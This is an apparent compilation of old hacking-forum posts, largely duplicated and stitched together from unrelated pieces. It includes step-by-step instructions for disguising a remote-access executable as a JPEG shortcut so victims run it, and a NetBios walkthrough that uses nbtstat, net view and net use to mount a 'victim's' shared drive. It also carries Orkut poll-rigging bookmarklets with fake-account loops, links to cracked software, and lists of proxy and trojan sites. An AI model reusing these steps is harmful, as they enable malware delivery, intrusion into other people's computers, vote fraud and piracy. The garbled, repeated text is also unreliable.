If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...
As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.
If you click Connect, you should see more options. Here they are.
Connect:
Remote System..
Disconnect
Exit
Names of servers you have been on.
To connect to a server, click Remote System...
This will then take you to a dialog box that has these fields:
Hostname:
Port:
TermType:
There should also be a Connect button and a Cancel Button.
Lets go over these & what you should put in them.
-Hostname-
The Hostname can be the address of the website your going to be connecting to:
http://www.google.com
or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)
an IP Address looks like this: 64.233.167.99
-Port-
Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)
or you can keep it Telnet and see what happens.
-TermType-
TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.
When you have all this set up, you can Click Connect & see what happens.
Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.
Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.
Ok that's all for the Connect Menu, lets go over the Terminal menu.
The terminal menu should have 3 options:
Prefernces
Start Logging
Stop Logging.
-Prefernces-
If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not un check, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emulation type, always have this set on the default unless you know what the second one is and you know what your doing.
-Start Logging-
This logs everything you do on Telnet in a log file on your computer.
-Stop Logging-
This will stop logging processes.
Well that's it for basics of telnet. Thanks for reading.
For complete Guide on telnet visit happy hackers guide for telnet, Telnet: the Number One Hacker Tool is the guide title, from this guide really you can become a hacker
::Don't use this for illegal stuff::
Introduction:
Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.
Lets Start:
In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.
If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...
As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.
If you click Connect, you should see more options. Here they are.
Connect:
Remote System..
Disconnect
Exit
Names of servers you have been on.
To connect to a server, click Remote System...
This will then take you to a dialog box that has these fields:
Hostname:
Port:
TermType:
There should also be a Connect button and a Cancel Button.
Lets go over these & what you should put in them.
-Hostname-
The Hostname can be the address of the website your going to be connecting to:
http://www.google.com
or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)
an IP Address looks like this: 64.233.167.99
-Port-
Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)
or you can keep it Telnet and see what happens.
-TermType-
TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.
When you have all this set up, you can Click Connect & see what happens.
Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.
Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.
Ok that's all for the Connect Menu, lets go over the Terminal menu.
The terminal menu should have 3 options:
Prefernces
Start Logging
Stop Logging.
-Prefernces-
If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not un check, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emulation type, always have this set on the default unless you know what the second one is and you know what your doing.
-Start Logging-
This logs everything you do on Telnet in a log file on your computer.
-Stop Logging-
This will stop logging processes.
Well that's it for basics of telnet. Thanks for reading.
For complete Guide on telnet visit happy hackers guide for telnet, Telnet: the Number One Hacker Tool is the guide title, from this guide really you can become a hacker
Converting .exe files to .jpg !
1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
PROXYZ
ACIDBROWSE.INFO
ACTIVEBROWSE.INFO
AFRICABROWSE.INFO
AMERICABROWSE.INFO
ANNUALBROWSE.INFO
AREABROWSE.INFO
ASIABROWSE.INFO
ASSETBROWSE.INFO
AVENUEBROWSE.INFO
AVGBROWSE.INFO
BIGADDABROWSE.INFO
BIGDOGBROWSE.INFO
CALLBROWSE.INFO
CAMBROWSE.INFO
CAPBROWSE.INFO
CAPITALBROWSE.INFO
CARBROWSE.INFO
CELLBROWSE.INFO
CITYBROWSE.INFO
COMMONBROWSE.INFO
COMPANYBROWSE.INFO
COMPLEXBROWSE.INFO
CONTROLBROWSE.INFO
CRICKETBROWSE.INFO
CYBERBROWSE.INFO
DISCOVERBROWSE.INFO
EARTHBROWSE.INFO
ENTRYBROWSE.INFO
EUROPEBROWSE.INFO
FACEBOOKBROWSE.INFO
FOOTBALLBROWSE.INFO
FOXBROWSE.INFO
FUNDBROWSE.INFO
GENERALBROWSE.INFO
GROUPBROWSE.INFO
GUCCIBROWSE.INFO
HI5BROWSE.INFO
HOLDINGBROWSE.INFO
HOTMAILBROWSE.INFO
ICEBROWSE.INFO
INDIANABROWSE.INFO
INDUSTRYBROWSE.INFO
INSANEBROWSE.INFO
KITKATBROWSE.INFO
LEVISBROWSE.INFO
LIFEBROWSE.INFO
LIMITEDBROWSE.INFO
LOVELYBROWSE.INFO
MAJORBROWSE.INFO
MANAGEBROWSE.INFO
MARSBROWSE.INFO
MEANBROWSE.INFO
MEGABROWSE.INFO
MINORBROWSE.INFO
MMSBROWSE.INFO
MONOBROWSE.INFO
MSNBROWSE.INFO
NAMEBROWSE.INFO
NATIONBROWSE.INFO
NATURALBROWSE.INFO
NATUREBROWSE.INFO
NAUGHTYBROWSE.INFO
NAVELBROWSE.INFO
NIKEBROWSE.INFO
NOMINALBROWSE.INFO
OBJECTBROWSE.INFO
ORDINARYBROWSE.INFO
ORKUTBROWSE.INFO
PACIFICBROWSE.INFO
PEOPLEBROWSE.INFO
PLAYERBROWSE.INFO
PRACTICALBROWSE.INFO
PREMIUMBROWSE.INFO
PRETTYBROWSE.INFO
PROFITBROWSE.INFO
PUBLICBROWSE.INFO
RAREBROWSE.INFO
REGISTEREDBROWSE.INFO
REVENUEBROWSE.INFO
ROOKIEBROWSE.INFO
SCRIPTBROWSE.INFO
SEXYBROWSE.INFO
SHARKBROWSE.INFO
SLEEPINGBROWSE.INFO
SMSBROWSE.INFO
SNOWBROWSE.INFO
SPEEDBROWSE.INFO
SSQHOLDINGS.COM
STATEBROWSE.INFO
STOCKBROWSE.INFO
SUCCESSBROWSE.INFO
SUNBROWSE.INFO
TAGGEDBROWSE.INFO
TAXBROWSE.INFO
TELEBROWSE.INFO
TEXASBROWSE.INFO
TISSOTBROWSE.INFO
TRUEBROWSE.INFO
UNDERCOVERBROWSE.INFO
UNIQUEBROWSE.INFO
UNLIMITEDBROWSE.INFO
URLBROWSE.INFO
VERTICALBROWSE.INFO
WAREZBROWSE.INFO
WWEBROWSE.INFO
ZIPBROWSE.INFO
ZORPIABROWSE.INFO
ACTIVEBROWSE.INFO
AFRICABROWSE.INFO
AMERICABROWSE.INFO
ANNUALBROWSE.INFO
AREABROWSE.INFO
ASIABROWSE.INFO
ASSETBROWSE.INFO
AVENUEBROWSE.INFO
AVGBROWSE.INFO
BIGADDABROWSE.INFO
BIGDOGBROWSE.INFO
CALLBROWSE.INFO
CAMBROWSE.INFO
CAPBROWSE.INFO
CAPITALBROWSE.INFO
CARBROWSE.INFO
CELLBROWSE.INFO
CITYBROWSE.INFO
COMMONBROWSE.INFO
COMPANYBROWSE.INFO
COMPLEXBROWSE.INFO
CONTROLBROWSE.INFO
CRICKETBROWSE.INFO
CYBERBROWSE.INFO
DISCOVERBROWSE.INFO
EARTHBROWSE.INFO
ENTRYBROWSE.INFO
EUROPEBROWSE.INFO
FACEBOOKBROWSE.INFO
FOOTBALLBROWSE.INFO
FOXBROWSE.INFO
FUNDBROWSE.INFO
GENERALBROWSE.INFO
GROUPBROWSE.INFO
GUCCIBROWSE.INFO
HI5BROWSE.INFO
HOLDINGBROWSE.INFO
HOTMAILBROWSE.INFO
ICEBROWSE.INFO
INDIANABROWSE.INFO
INDUSTRYBROWSE.INFO
INSANEBROWSE.INFO
KITKATBROWSE.INFO
LEVISBROWSE.INFO
LIFEBROWSE.INFO
LIMITEDBROWSE.INFO
LOVELYBROWSE.INFO
MAJORBROWSE.INFO
MANAGEBROWSE.INFO
MARSBROWSE.INFO
MEANBROWSE.INFO
MEGABROWSE.INFO
MINORBROWSE.INFO
MMSBROWSE.INFO
MONOBROWSE.INFO
MSNBROWSE.INFO
NAMEBROWSE.INFO
NATIONBROWSE.INFO
NATURALBROWSE.INFO
NATUREBROWSE.INFO
NAUGHTYBROWSE.INFO
NAVELBROWSE.INFO
NIKEBROWSE.INFO
NOMINALBROWSE.INFO
OBJECTBROWSE.INFO
ORDINARYBROWSE.INFO
ORKUTBROWSE.INFO
PACIFICBROWSE.INFO
PEOPLEBROWSE.INFO
PLAYERBROWSE.INFO
PRACTICALBROWSE.INFO
PREMIUMBROWSE.INFO
PRETTYBROWSE.INFO
PROFITBROWSE.INFO
PUBLICBROWSE.INFO
RAREBROWSE.INFO
REGISTEREDBROWSE.INFO
REVENUEBROWSE.INFO
ROOKIEBROWSE.INFO
SCRIPTBROWSE.INFO
SEXYBROWSE.INFO
SHARKBROWSE.INFO
SLEEPINGBROWSE.INFO
SMSBROWSE.INFO
SNOWBROWSE.INFO
SPEEDBROWSE.INFO
SSQHOLDINGS.COM
STATEBROWSE.INFO
STOCKBROWSE.INFO
SUCCESSBROWSE.INFO
SUNBROWSE.INFO
TAGGEDBROWSE.INFO
TAXBROWSE.INFO
TELEBROWSE.INFO
TEXASBROWSE.INFO
TISSOTBROWSE.INFO
TRUEBROWSE.INFO
UNDERCOVERBROWSE.INFO
UNIQUEBROWSE.INFO
UNLIMITEDBROWSE.INFO
URLBROWSE.INFO
VERTICALBROWSE.INFO
WAREZBROWSE.INFO
WWEBROWSE.INFO
ZIPBROWSE.INFO
ZORPIABROWSE.INFO
How to get orkut login with PHP
header("Content-Type: text/html; charset=UTF-8"); // maybe you need to change the charset
require('class.XMLHttpRequest.php');
$req = new XMLHttpRequest();
$req->open("GET","https://www.google.com/accounts/ClientLogin?Email=your@email.login&Passwd=yourgoogleaccontpassword&service=orkut&skipvpage=true&sendvemail=false");
$req->send(null);
preg_match("/auth=(.*?)\n/i", $req->responseText, $auth);
$req->open("GET","http://www.orkut.com/RedirLogin.aspx?auth=".$auth[1]);
$req->send(null);
preg_match("/orkut_state=[^;]*/i", $req->getResponseHeader('Set-Cookie'), $orkut_state);
$req->open("GET","http://www.orkut.com/Community.aspx?cmm=43558952");
$req->setRequestHeader("Cookie",$orkut_state[0]);
$req->send(null);
echo $req->responseText;
?>
require('class.XMLHttpRequest.php');
$req = new XMLHttpRequest();
$req->open("GET","https://www.google.com/accounts/ClientLogin?Email=your@email.login&Passwd=yourgoogleaccontpassword&service=orkut&skipvpage=true&sendvemail=false");
$req->send(null);
preg_match("/auth=(.*?)\n/i", $req->responseText, $auth);
$req->open("GET","http://www.orkut.com/RedirLogin.aspx?auth=".$auth[1]);
$req->send(null);
preg_match("/orkut_state=[^;]*/i", $req->getResponseHeader('Set-Cookie'), $orkut_state);
$req->open("GET","http://www.orkut.com/Community.aspx?cmm=43558952");
$req->setRequestHeader("Cookie",$orkut_state[0]);
$req->send(null);
echo $req->responseText;
?>
NetBios Hacking
[L33T]NetBios Hacking
NetBios hacking for windows 95/98/ME/NT/XP
Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see:
c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
------------------------------
----------
-----------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.
Step 3
type down:
c:windows>net view 255.255.255.255
if the output is like this:
Shared resources at 255.255.255.255
ComputerNameGoesHere
Sharename Type Used as Comment
------------------------------------------------------------
CDISK Disk xxxxx xxxxx
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK
Step 4
type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.
c:windows>net use x: 255.255.255.255CDISK
If the command is successful we will get the confirmation.
The command was completed successfullly
Now open windows explorer or just double click on the My Computer icon on your
NetBios hacking for windows 95/98/ME/NT/XP
Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see:
c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
------------------------------
----------
-----------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.
Step 3
type down:
c:windows>net view 255.255.255.255
if the output is like this:
Shared resources at 255.255.255.255
ComputerNameGoesHere
Sharename Type Used as Comment
------------------------------------------------------------
CDISK Disk xxxxx xxxxx
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK
Step 4
type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.
c:windows>net use x: 255.255.255.255CDISK
If the command is successful we will get the confirmation.
The command was completed successfullly
Now open windows explorer or just double click on the My Computer icon on your
proxy server ki dukan..[:p][:d]
http://rapidshare.com/files/100264100/proxy.rar
http://rapidshare.com/files/100264259/Proxy_tunneling_n_net_boosters.rar
http://rapidshare.com/files/100264351/proxyway.rar
http://rapidshare.com/files/100264467/proxyway_1_.rar
http://rapidshare.com/files/100264566/proxyway_2_.rar
http://rapidshare.com/files/100264617/ProxyWay_Extra_3.2.rar
http://rapidshare.com/files/100264639/ProxyWay_Extra_3.2UploadBySunfire.rar
http://rapidshare.com/files/100264765/ProxyWay_Extra_3.2UploadBySunfire_1_.rar
http://rapidshare.com/files/100264779/Stm_ins.rar
http://rapidshare.com/files/100264839/SurfNoLimitInstallation.rar
http://rapidshare.com/files/100264882/SurfolaProxyRedirector.rar
http://rapidshare.com/files/100265160/WinGate6.2.2.1137-USE.rar
http://rapidshare.com/files/100266649/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100266810/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261491/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100261762/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261768/A4Proxy_2.8.rar
http://rapidshare.com/files/100261886/ccproxy.rar
http://rapidshare.com/files/100262651/CheckpPro-HTTP-Demo-4.20-554.rar
http://rapidshare.com/files/100262666/elHTTPProxy100.rar
http://rapidshare.com/files/100262708/ezProxy.rar
http://rapidshare.com/files/100262799/Free_Proxy.rar
http://rapidshare.com/files/100262977/ghostsurf-platinum.rar
http://rapidshare.com/files/100263067/iampplus_pro.rar
http://rapidshare.com/files/100263110/iptunnelmng.rar
http://rapidshare.com/files/100263228/IQReverseProxy.rar
http://rapidshare.com/files/100263269/IQReverseProxyGUI.rar
http://rapidshare.com/files/100263379/IQWebFTPServer.rar
http://rapidshare.com/files/100263691/MECLBvr2X.rar
http://rapidshare.com/files/100263767/NetFile.rar
http://rapidshare.com/files/100264083/Proksi.rar
http://rapidshare.com/files/100261716/WinGateInstall .zip
http://rapidshare.com/files/100265187/a4proxy .zip
http://rapidshare.com/files/100265204/Anonymity_4_Proxy__A4Proxy__v2.8 .zip
http://rapidshare.com/files/100265220/Cr_ck_proxyway_ .zip
http://rapidshare.com/files/100265258/elHTTPProxy100 .zip
http://rapidshare.com/files/100265263/eternallinesetlinhttpproxyv1.0.0.26crackunderpl .zip
http://rapidshare.com/files/100265352/freeproxy .zip
http://rapidshare.com/files/100265361/httpclient .zip
[content suppressed] .zip
http://rapidshare.com/files/100265397/snd-proxywayextra3.2.cracked.exe_2_ .zip
http://rapidshare.com/files/100265455/WinGateHelp .zip
http://rapidshare.com/files/100266714/a4proxy .zip
http://rapidshare.com/files/100266743/WinGateInstall .zip
http://rapidshare.com/files/100264259/Proxy_tunneling_n_net_boosters.rar
http://rapidshare.com/files/100264351/proxyway.rar
http://rapidshare.com/files/100264467/proxyway_1_.rar
http://rapidshare.com/files/100264566/proxyway_2_.rar
http://rapidshare.com/files/100264617/ProxyWay_Extra_3.2.rar
http://rapidshare.com/files/100264639/ProxyWay_Extra_3.2UploadBySunfire.rar
http://rapidshare.com/files/100264765/ProxyWay_Extra_3.2UploadBySunfire_1_.rar
http://rapidshare.com/files/100264779/Stm_ins.rar
http://rapidshare.com/files/100264839/SurfNoLimitInstallation.rar
http://rapidshare.com/files/100264882/SurfolaProxyRedirector.rar
http://rapidshare.com/files/100265160/WinGate6.2.2.1137-USE.rar
http://rapidshare.com/files/100266649/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100266810/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261491/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100261762/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261768/A4Proxy_2.8.rar
http://rapidshare.com/files/100261886/ccproxy.rar
http://rapidshare.com/files/100262651/CheckpPro-HTTP-Demo-4.20-554.rar
http://rapidshare.com/files/100262666/elHTTPProxy100.rar
http://rapidshare.com/files/100262708/ezProxy.rar
http://rapidshare.com/files/100262799/Free_Proxy.rar
http://rapidshare.com/files/100262977/ghostsurf-platinum.rar
http://rapidshare.com/files/100263067/iampplus_pro.rar
http://rapidshare.com/files/100263110/iptunnelmng.rar
http://rapidshare.com/files/100263228/IQReverseProxy.rar
http://rapidshare.com/files/100263269/IQReverseProxyGUI.rar
http://rapidshare.com/files/100263379/IQWebFTPServer.rar
http://rapidshare.com/files/100263691/MECLBvr2X.rar
http://rapidshare.com/files/100263767/NetFile.rar
http://rapidshare.com/files/100264083/Proksi.rar
http://rapidshare.com/files/100261716/WinGateInstall .zip
http://rapidshare.com/files/100265187/a4proxy .zip
http://rapidshare.com/files/100265204/Anonymity_4_Proxy__A4Proxy__v2.8 .zip
http://rapidshare.com/files/100265220/Cr_ck_proxyway_ .zip
http://rapidshare.com/files/100265258/elHTTPProxy100 .zip
http://rapidshare.com/files/100265263/eternallinesetlinhttpproxyv1.0.0.26crackunderpl .zip
http://rapidshare.com/files/100265352/freeproxy .zip
http://rapidshare.com/files/100265361/httpclient .zip
[content suppressed] .zip
http://rapidshare.com/files/100265397/snd-proxywayextra3.2.cracked.exe_2_ .zip
http://rapidshare.com/files/100265455/WinGateHelp .zip
http://rapidshare.com/files/100266714/a4proxy .zip
http://rapidshare.com/files/100266743/WinGateInstall .zip
Azureus Installer + Shu Mod 2.2.1.180 (Hack)
Azureus Installer + Shu Mod 2.2.1.180 (Hack Version)
Hack Changelog:
- Removed all checking and version code
- Added an Update News & Version button
- Button asks if you want to update just news or just version
- Includes ORIGINAL Azureus splash screen
- Removed Login boxes from the Shu Config Sections
- Removes access to the Shu Donation Window
- Donation window replaced with a Shu Mod About Box
- Some labels are changed to show 00DE and myself
WHAT IT DOES:
Stops Shu Mod from accessing the Shu website.
Disabled Authentication check.
Disabled Shu Mod Version check.
Disabled News check.
All Users have "admin" access.
Enabled No Upload and other non-public features.
Added Check News button to check current news and version
Removed Donation windows for Shu
This also includes the latest plugins and recommended plugins
- 3D View
- Advanced Statistics
- Sudoku
- AutoCategory
- Peer Injector
- Chat
- Ratings
- Client Spoof Plus
- Country Locator
- Monitoring Plugin
- Multi-Port
- Progress Bar
- RSS Feed
- Seeding Columns
- Speed Scheduler
Code:
http://rapidshare.com/files/102881182/Azureus_v2.5.rar
Hack Changelog:
- Removed all checking and version code
- Added an Update News & Version button
- Button asks if you want to update just news or just version
- Includes ORIGINAL Azureus splash screen
- Removed Login boxes from the Shu Config Sections
- Removes access to the Shu Donation Window
- Donation window replaced with a Shu Mod About Box
- Some labels are changed to show 00DE and myself
WHAT IT DOES:
Stops Shu Mod from accessing the Shu website.
Disabled Authentication check.
Disabled Shu Mod Version check.
Disabled News check.
All Users have "admin" access.
Enabled No Upload and other non-public features.
Added Check News button to check current news and version
Removed Donation windows for Shu
This also includes the latest plugins and recommended plugins
- 3D View
- Advanced Statistics
- Sudoku
- AutoCategory
- Peer Injector
- Chat
- Ratings
- Client Spoof Plus
- Country Locator
- Monitoring Plugin
- Multi-Port
- Progress Bar
- RSS Feed
- Seeding Columns
- Speed Scheduler
Code:
http://rapidshare.com/files/102881182/Azureus_v2.5.rar
REPLY wid javascript[FASTESTEST REPLY]
javascript:f=prompt('Put your Commentz here:','');cmm=location.href.match(/cmm.*/);tid=location.href.match(/tid=\d*/);a=document.forms[1];;a=document.forms[1];a.action='/CommMsgPost.aspx?'+cmm+'&'+tid+'&bodyText='+f+'&Action.submit';a.submit();void(0)
[sites]heackers paradize
01. http://www.hackthissite.org/
02. http://www.cyberarmy.com/zebulun/
03. http://loginmatrix.com/hackme/
04. http://www.try2hack.nl/
05. http://roothack.org/
06. http://www.pulltheplug.com/
07. http://www.hellboundhackers.org/
08. http://www.rootthisbox.org/
09. http://theory.lcs.mit.edu/~rivest/crypto-security.html
10. http://www.oberlin.edu/~brchkind/cyphernomicon/
11. http://www.cacr.math.uwaterloo.ca/hac/ (Handbook of Applied Cryptography)
12. http://www.tunix.kun.nl/ptr/tcpip.html
13. http://www.cisco.com/univercd/cc/td/doc/product/ (Cisco Product Documentation)
14. http://www.rsasecurity.com/
15. http://www.kremlinencrypt.com/
16. http://cryptography.org/freecryp.htm
17. http://world.std.com/~franl/crypto/
18. http://www.e4m.net/
19. http://www.cybercrime.gov/crypto.html
20. http://www.crypto.com/
21. http://www.cryptome.org
22. http://www.security-forums.com/crypto
23. http://www.skuz.net/
24. http://packetstormsecurity.nl/trojans/
25. http://www.trojanforge.net/
26. http://www.areyoufearless.com/
27. http://www.dark-e.com
28. http://www.sub7.net/
29. http://bo2k.sourceforge.net/
30. http://www.tlsecurity.net/amt.htm
31. http://www.cultdeadcow.com/
32. http://www.anti-trojan.org/
33. http://www.sophos.com/
34. http://vil.mcafee.com/ (Virus Library)
35. http://www.firewallguide.com/
36. http://www.softbytelabs.com/Frames.html (Black Widow)
37. http://sandsprite.com/Sleuth (Web Sleuth)
38. http://www.immunitysec.com/spike.html (Spike Proxy)
these sites contain softs tht may wack ur computer out...
when u play wid em ..it's like playing wid a fire...
if u r not sure abt it don't do it
02. http://www.cyberarmy.com/zebulun/
03. http://loginmatrix.com/hackme/
04. http://www.try2hack.nl/
05. http://roothack.org/
06. http://www.pulltheplug.com/
07. http://www.hellboundhackers.org/
08. http://www.rootthisbox.org/
09. http://theory.lcs.mit.edu/~rivest/crypto-security.html
10. http://www.oberlin.edu/~brchkind/cyphernomicon/
11. http://www.cacr.math.uwaterloo.ca/hac/ (Handbook of Applied Cryptography)
12. http://www.tunix.kun.nl/ptr/tcpip.html
13. http://www.cisco.com/univercd/cc/td/doc/product/ (Cisco Product Documentation)
14. http://www.rsasecurity.com/
15. http://www.kremlinencrypt.com/
16. http://cryptography.org/freecryp.htm
17. http://world.std.com/~franl/crypto/
18. http://www.e4m.net/
19. http://www.cybercrime.gov/crypto.html
20. http://www.crypto.com/
21. http://www.cryptome.org
22. http://www.security-forums.com/crypto
23. http://www.skuz.net/
24. http://packetstormsecurity.nl/trojans/
25. http://www.trojanforge.net/
26. http://www.areyoufearless.com/
27. http://www.dark-e.com
28. http://www.sub7.net/
29. http://bo2k.sourceforge.net/
30. http://www.tlsecurity.net/amt.htm
31. http://www.cultdeadcow.com/
32. http://www.anti-trojan.org/
33. http://www.sophos.com/
34. http://vil.mcafee.com/ (Virus Library)
35. http://www.firewallguide.com/
36. http://www.softbytelabs.com/Frames.html (Black Widow)
37. http://sandsprite.com/Sleuth (Web Sleuth)
38. http://www.immunitysec.com/spike.html (Spike Proxy)
these sites contain softs tht may wack ur computer out...
when u play wid em ..it's like playing wid a fire...
if u r not sure abt it don't do it
[TUT] Poll Voter....!!!
i m giovng you some script tht will help u to make poll voter if u have little knowledge of VB.. these script are based o Ajax...with ajax you dont need to navigate towards poll...just paste it on any orkut page and let the script handle the rest..!!!
Moreover ajax is lot more faster than the regular one..!!
The following one is for Voting
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&option="+"OPTION"+"&public_vote=1"+"&Action.vote=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollVote.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
The following One is for comment
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&postText="+encodeURIComponent(" Comment")+"&Action.submit=";var xml = new XMLHttpRequest();xml.open("POST", "/CommPollResults.aspx?cmm=CMM&pid=PID&pct=PCT", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
Now since some Polls require comm joininghere is one more script tht will help you...just Add this at the start of one the scripts given above
javascript:send="POST_TOKEN=" + encodeURIComponent(JSHDF['CGI.POST_TOKEN']) + "&signature=" + encodeURIComponent(JSHDF['Page.signature.raw']) + "&Action.join=";var xml = new XMLHttpRequest();xml.open("POST", "/CommunityJoin.aspx?cmm=32982657", true);xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");xml.send(send);void(0)
THESE SCRIPTS ARE WORKING IN FF i dont know abt IE 7..!!!
____________________________________________________________________
NOw some tips to make your POll voter
1..create a textbox and ask ppl to enter fakes in following manner
_________________
Text1.text
_________________
user1:Pass1
user2:pass2
_________________
_________________
2..now use the command Split...Split breaks the pasticular character and makes and array ouuta them
start:
dim a
dim i=0
a=split(text1.text,vbcrlf)
b=split(a(i),":")
user=b(0)
pass=b(1)
if i=ubound(a) then
masgbox("Fakes khatam paisa hajam")
end if
ur function here
goto start
